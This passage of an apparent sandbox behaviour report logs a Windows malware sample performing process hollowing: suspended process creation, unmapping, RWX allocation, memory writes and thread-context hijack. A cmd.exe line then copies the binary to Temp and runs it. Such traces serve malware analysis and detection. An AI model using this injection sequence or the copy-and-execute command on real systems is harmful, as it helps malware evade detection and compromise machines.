GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0093.698] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0093.698] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0093.698] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0093.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0093.698] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0093.698] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0093.698] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0093.699] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x8013c [0093.754] PostMessageA (hWnd=0x8013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0093.754] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0093.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 
0x1d0000 [0093.754] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1d0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.754] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.754] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xaec, dwThreadId=0xaf0)) returned 1 [0093.756] VirtualFree (lpAddress=0x1d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.756] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1d0000 [0093.756] GetThreadContext (in: hThread=0x48, lpContext=0x1d0000 | out: lpContext=0x1d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, 
[14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, 
[110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, 
[291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, 
[472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0093.824] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0093.824] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0093.824] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0093.824] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x6845d8*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x6845d8*, lpNumberOfBytesWritten=0x0) returned 1 [0093.825] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x6849d8, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0093.825] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x6849d8*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x6849d8*, lpNumberOfBytesWritten=0x0) returned 1 [0093.836] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x6d8fd8*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x6d8fd8*, lpNumberOfBytesWritten=0x0) returned 1 [0093.836] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x68470c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x68470c*, lpNumberOfBytesWritten=0x0) returned 1 [0093.836] SetThreadContext (hThread=0x48, lpContext=0x1d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, 
FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, 
[77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, 
[260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, 
[441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0093.866] ResumeThread (hThread=0x48) returned 0x1 [0093.866] CloseHandle (hObject=0x48) returned 1 [0093.866] CloseHandle (hObject=0x4c) returned 1 [0093.866] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.867] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0093.867] ExitProcess (uExitCode=0x0) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE 
LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 460 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 461 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 462 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 463 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 464 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 465 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 466 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 467 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 468 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 469 start_va = 0x7ffdf000 end_va = 